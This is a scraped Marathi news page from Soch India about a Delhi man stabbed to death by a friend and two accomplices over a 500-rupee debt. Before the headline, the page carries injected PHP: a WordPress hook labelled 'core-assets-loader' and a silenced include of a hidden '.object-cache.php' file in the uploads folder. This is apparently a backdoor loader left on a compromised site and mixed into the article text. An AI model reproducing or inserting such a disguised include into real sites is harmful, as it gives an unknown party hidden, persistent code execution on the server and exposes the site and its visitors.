add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 500 रुपयांसाठी मित्रानेच केला मित्राचा खून – SOCH INDIA
Menu

अपराध समाचार
500 रुपयांसाठी मित्रानेच केला मित्राचा खून

nobanner

मित्राला उधार दिलेले 500 रुपये परत मागितल्याने मित्रानेच मित्राचा खून केल्याचा धक्कादायक प्रकार घडला आहे. दिल्लीतील कल्याणपुरी येथील ही घटना आहे. 500 रुपये परत मागितल्याने 2 मित्रांमध्ये वाद झाला. ज्य़ामध्ये 24 वर्षाच्या युवकाची हत्या करण्यात आली. या हत्येत आणखी 2 जण देखील शामील असल्याची माहिती आहे.

मित्राचाच खून
पोलिसांनी म्हटलं की, उधारीवर दिलेले 500 रुपये मागण्यासाठी शाहरुख त्याचा मित्र मुकेशच्या घरी गेला होता. मुकेश यावेळी घरी नव्हता. जेव्हा तो घरी आला तेव्हा त्याच्या पत्नीने त्याला ही गोष्ट सांगितली. पोलिसांच्या माहितीनुसार या रागात त्याने शाहरुखचा खून केला. मुकेश सोबत त्याचे 2 मित्र खालिद आणि किशोर देखील होता. तिघांनी मिळून शाहरुखला मारहाण केली आणि त्यानंतर त्याची चाकूने हत्या केली.

12 वेळा चाकुने वार
शाहरुखच्या शरिरावर 12 वेळा वार करण्यात आले होते. हत्येनंतर तिघेही तेथून फरार झाले. शाहरुखला उपचारासाठी रुग्णालयात दाखल करण्यात आलं. पण या दरम्यान त्याचा मृत्यू झाला. पोलिसांनी खालिद, मुकेश आणि किशोरला अटक केली आहे. याआधी देखील मुकेशवर वाद-विवाद आणि खालिदवर चोरीची तक्रार दाखल आहे.